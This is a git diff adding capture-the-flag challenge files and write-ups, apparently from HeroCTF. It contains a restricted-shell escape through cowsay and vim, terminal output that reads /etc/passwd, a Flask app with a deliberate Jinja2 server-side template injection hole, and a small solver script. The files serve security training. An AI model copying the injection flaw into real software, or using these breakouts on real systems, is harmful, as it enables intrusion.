add web/jinjatic

misc/cloud_shell/README.md

@@ -0,0 +1,75 @@
+```
+/ $ echo $PATH
+/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+/ $ ls -l /usr/local/sbin
+ls: /usr/local/sbin: No such file or directory
+/ $ ls -l /usr/local/bin
+ls: /usr/local/bin: No such file or directory
+/ $ ls -l /usr/sbin
+ls: /usr/sbin: No such file or directory
+/ $ ls -l /usr/bin
+ls: /usr/bin: No such file or directory
+/ $ ls -l /sbin
+ls: /sbin: No such file or directory
+/ $ ls -l /bin
+total 4120
+-rwxr-xr-x    1 root     0           808712 Oct 24 17:14 cat
+-rwxr-xr-x    2 root     0           443480 Oct 24 17:14 cloud_cat
+-rwxr-xr-x    1 root     0           443480 Oct 24 17:14 cloud_create
+-rwxr-xr-x    1 root     0           443480 Oct 24 17:14 cloud_list
+-rwxr-xr-x    1 root     0           443480 Oct 24 17:14 cloud_mv
+-rwxr-xr-x    1 root     0           808712 Oct 24 17:14 ls
+-rwxr-xr-x    1 root     0           808712 Oct 24 17:14 sh
+```
+
+```
+/ $ cat /etc/passwd
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+gaoler:x:1000:1000:Linux User,,,:/home/gaoler:/bin/sh
+restricted:x:1001:1001:Linux User,,,:/home/restricted:/bin/jail
+```
+
+```
+  ____ _                 _   ____  _          _ _
+ / ___| | ___  _   _  __| | / ___|| |__   ___| | |
+| |   | |/ _ \| | | |/ _` | \___ \| '_ \ / _ \ | |
+| |___| | (_) | |_| | (_| |  ___) | | | |  __/ | |
+ \____|_|\___/ \__,_|\__,_| |____/|_| |_|\___|_|_|
+
+
+Welcome to Cloud Shell !
+
+Here you can interact with your personal vault using our custom binaries :
+- cloud_cat : Get the content of the specified file
+- cloud_list : List your current file(s)
+- cloud_mv : Rename a file
+- cloud_create : Create a file with his content
+
+If you don't know how to use a binary, just execute it without arguments, help will be provided !
+
+/ $ cloud_cat
+Usage: cloud_cat <file_name>
+/ $ cloud_list
+cloud_socket
+/ $ cloud_mv
+Usage: cloud_mv <old_name> <new_name>
+/ $ cloud_create
+Usage: cloud_create <file_name> <content>
+/ $
+```

misc/moo/README.md

@@ -0,0 +1,80 @@
+# misc/Moo
+We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.
+
+```
+ssh -p 11380 dyn05.heroctf.fr
+user@dyn05.heroctf.fr's password:
+Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
+ ______________________________________________________
+/ Welcome dear CTF player! You can read the flag with: \
+\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
+ ------------------------------------------------------
+        \   ^__^
+         \  (oo)\_______
+            (__)\       )\/\
+                ||----w |
+                ||     ||
+```
+
+When we try to run the commands, we see we're in a restricted shell:
+```
+user@moo:~$ /bin/sudo /bin/cat /flag.txt
+bash: /bin/sudo: restricted: cannot specify `/' in command names
+```
+
+Let's take a look at our environment a bit with `env`:
+```
+bash: env: command not found
+```
+
+Next thing to do would be look at what our `PATH` is set to:
+```
+user@moo:~$ echo $PATH
+/usr/local/rbin
+```
+
+Attempting to update our `PATH` with `export` fails as well:
+```
+user@moo:~$ PATH=/bin sudo id
+bash: PATH: readonly variable
+bash: sudo: command not found
+```
+
+Well, let's see what is actually available to us in the only `PATH` we have available:
+```
+user@moo:~$ ls -la $PATH
+total 24
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
+lrwxrwxrwx 1 root root   17 Oct 25 18:18 cowsay -> /usr/games/cowsay
+lrwxrwxrwx 1 root root   18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
+lrwxrwxrwx 1 root root    7 Oct 25 18:18 ls -> /bin/ls
+-rwxr-xr-x 1 root root  206 Oct 25 17:35 rbash
+-rwxr-xr-x 1 root root   54 Oct 25 17:35 vim
+```
+
+This reveals a few things:
+- We are in a restricted bashshell
+- We have `cowsay`
+
+So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
+`vim`.
+
+After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
+```
+cowsay -f tmp x
+```
+
+This gives us a full unrestricted shell, and we can now `cat` the flag:
+```
+PATH=/bin 
+Hero{s0m3_s4cr3d_c0w}
+```

web/jinjatic/jinjatic/docker-compose.yml

@@ -0,0 +1,14 @@
+version: '3.8'
+
+services:
+  web:
+    build: 
+      context: ./src/
+    ports:
+      - "8000:80"
+    restart: unless-stopped
+    deploy:
+      resources:
+        limits:
+          cpus: "0.5"
+          memory: 1G

web/jinjatic/jinjatic/src/Dockerfile

@@ -0,0 +1,26 @@
+FROM alpine:3.17.0
+
+# Init
+RUN apk update && \
+    apk add --no-cache gcc libc-dev python3 py3-pip && \
+# Create user
+    adduser -D -u 1000 challenge && \
+    echo "challenge:$(head -c 32 /dev/urandom | base64)" | chpasswd
+
+#Setup flag
+WORKDIR /root/
+COPY getflag.c .
+RUN gcc getflag.c -o getflag && \
+    chmod u+s getflag && \
+    mv getflag ../ && \
+    rm getflag.c
+COPY flag.txt .
+
+#Setup webapp
+WORKDIR /app/
+COPY ./challenge/ .
+RUN pip3 install -r requirements.txt
+
+USER challenge
+
+CMD ["python3","/app/app.py"]

web/jinjatic/jinjatic/src/challenge/app.py

@@ -0,0 +1,53 @@
+from flask import Flask, render_template, request
+from pydantic import BaseModel, EmailStr, ValidationError
+from jinja2 import Template
+
+app = Flask(__name__)
+
+email_template = '''
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Email Result</title>
+    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
+</head>
+<body>
+    <div class="container mt-5">
+        <div class="alert alert-success text-center">
+            <h1>Welcome on the platform !</h1>
+            <p>Your email to connect is: <strong>%s</strong></p>
+        </div>
+        <a href="/mail" class="btn btn-primary">Generate another welcome email</a>
+    </div>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
+</body>
+</html>
+'''
+
+class EmailModel(BaseModel):
+    email: EmailStr
+
+@app.route('/')
+def home():
+    return render_template('home.html')
+
+@app.route('/mail')
+def mail():
+    return render_template('mail.html')
+
+@app.route('/render', methods=['POST'])
+def render_email():
+    email = request.form.get('email')
+
+    try:
+        email_obj = EmailModel(email=email)
+        return Template(email_template%(email)).render()
+    except ValidationError as e:
+        return render_template('mail.html', error="Invalid email format.")
+
+if __name__ == '__main__':
+    app.run(host="0.0.0.0", port=80)

web/jinjatic/jinjatic/src/challenge/requirements.txt

@@ -0,0 +1,4 @@
+flask
+pydantic
+pydantic[email]
+jinja2

web/jinjatic/jinjatic/src/challenge/templates/home.html

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Home</title>
+    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
+</head>
+<body>
+    <div class="container mt-5">
+        <div class="jumbotron text-center">
+            <h1 class="display-4">We render, you use it</h1>
+            <p class="lead">Give us emails of your customers to send them a welcome email.</p>
+            <a href="/mail" class="btn btn-primary btn-lg">Go to Email Page</a>
+        </div>
+    </div>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
+</body>
+</html>

web/jinjatic/jinjatic/src/challenge/templates/mail.html

@@ -0,0 +1,35 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Mail</title>
+    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
+</head>
+<body>
+    <div class="container mt-5">
+        <div class="card">
+            <div class="card-body">
+                <h2 class="card-title text-center">Enter email of your client</h2>
+
+                {% if error %}
+                    <div class="alert alert-danger" role="alert">
+                        {{ error }}
+                    </div>
+                {% endif %}
+
+                <form action="/render" method="POST" class="mt-4">
+                    <div class="form-group">
+                        <label for="email">Email:</label>
+                        <input type="email" class="form-control" name="email" id="email" placeholder="customer@gmail.com" required>
+                    </div>
+                    <button type="submit" class="btn btn-primary btn-block">Generate</button>
+                </form>
+            </div>
+        </div>
+    </div>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
+</body>
+</html>

web/jinjatic/jinjatic/src/challenge/templates/result.html

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Email Result</title>
+    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
+</head>
+<body>
+    <div class="container mt-5">
+        <div class="alert alert-success text-center">
+            <h1>Welcome on the platform !</h1>
+            <p>Your email to connect is: <strong>{{ email }}</strong></p>
+        </div>
+        <a href="/mail" class="btn btn-primary">Generate another welcome email</a>
+    </div>
+
+    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
+</body>
+</html>

web/jinjatic/jinjatic/src/flag.txt

@@ -0,0 +1 @@
+HERO{FAKE_FLAG}

web/jinjatic/jinjatic/src/getflag.c

@@ -0,0 +1,21 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+    const char *file_path = "/root/flag.txt";
+    
+    FILE *file = fopen(file_path, "r");
+    if (file == NULL) {
+        perror("Erreur lors de l'ouverture du fichier");
+        return EXIT_FAILURE;
+    }
+
+    char ch;
+    while ((ch = fgetc(file)) != EOF) {
+        putchar(ch);
+    }
+
+    fclose(file);
+
+    return EXIT_SUCCESS;
+}

web/pryzes/PrYzes/solver.py

@@ -0,0 +1,22 @@
+import hashlib
+import json
+from datetime import datetime
+
+
+def compute_sha256(data):
+    sha256_hash = hashlib.sha256()
+    sha256_hash.update(data.encode("utf-8"))
+    return sha256_hash.hexdigest()
+
+
+def main():
+    # create datetime object with date 25/10/2121
+    date_obj = datetime.strptime("25/10/2121", "%d/%m/%Y")
+
+    json_data = json.dumps({"date": date_obj.strftime("%d/%m/%Y")})
+    print(compute_sha256(json_data))
+    print(json_data)
+
+
+if __name__ == '__main__':
+    main()